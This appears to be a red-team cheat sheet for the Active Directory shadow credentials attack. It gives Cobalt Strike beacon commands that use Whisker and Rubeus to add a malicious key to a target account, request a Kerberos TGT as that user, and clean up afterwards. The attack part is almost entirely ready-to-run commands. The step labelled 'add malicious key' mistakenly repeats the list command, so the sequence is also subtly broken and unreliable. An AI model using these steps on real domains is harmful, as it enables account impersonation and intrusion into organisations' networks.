When an account has shadow credentials configured, the client can obtain a TGT using these credentials (key). In other words, if an attacker has enough privileges to modify a target account’s DACL to add a shadow credential, he can obtain a TGT as that user.
The attack relies on the tool Whisker .
Take note of any existing keys on target account.
Add malicious key to target account.
Use key to obtain TGT.
Remove only the malicious key from target after use.
# list existing keys
beacon > execute - assembly C:\Tools\Whisker\Whisker\bin\Release\ Whisker.exe list / target:[ account ]
# add malicious key (record base64-encoded certificate, its encryption password, and deviceid)
beacon > execute - assembly C:\Tools\Whisker\Whisker\bin\Release\ Whisker.exe list / target:[ target-account ]
# get TGT
beacon > execute - assembly C:\Tools\Rubeus\Rubeus\bin\Release\ Rubeus.exe asktgt / user:[ target-account ] / certificate:[ cert-base64 ] / password: "[cert-password]" / nowrap
# remove added key (alternatively use `clear` to remove all keys)
beacon > execute - assembly C:\Tools\Whisker\Whisker\bin\Release\ Whisker.exe remove / target:[ target-account ] / deviceid:[ key-deviceid ]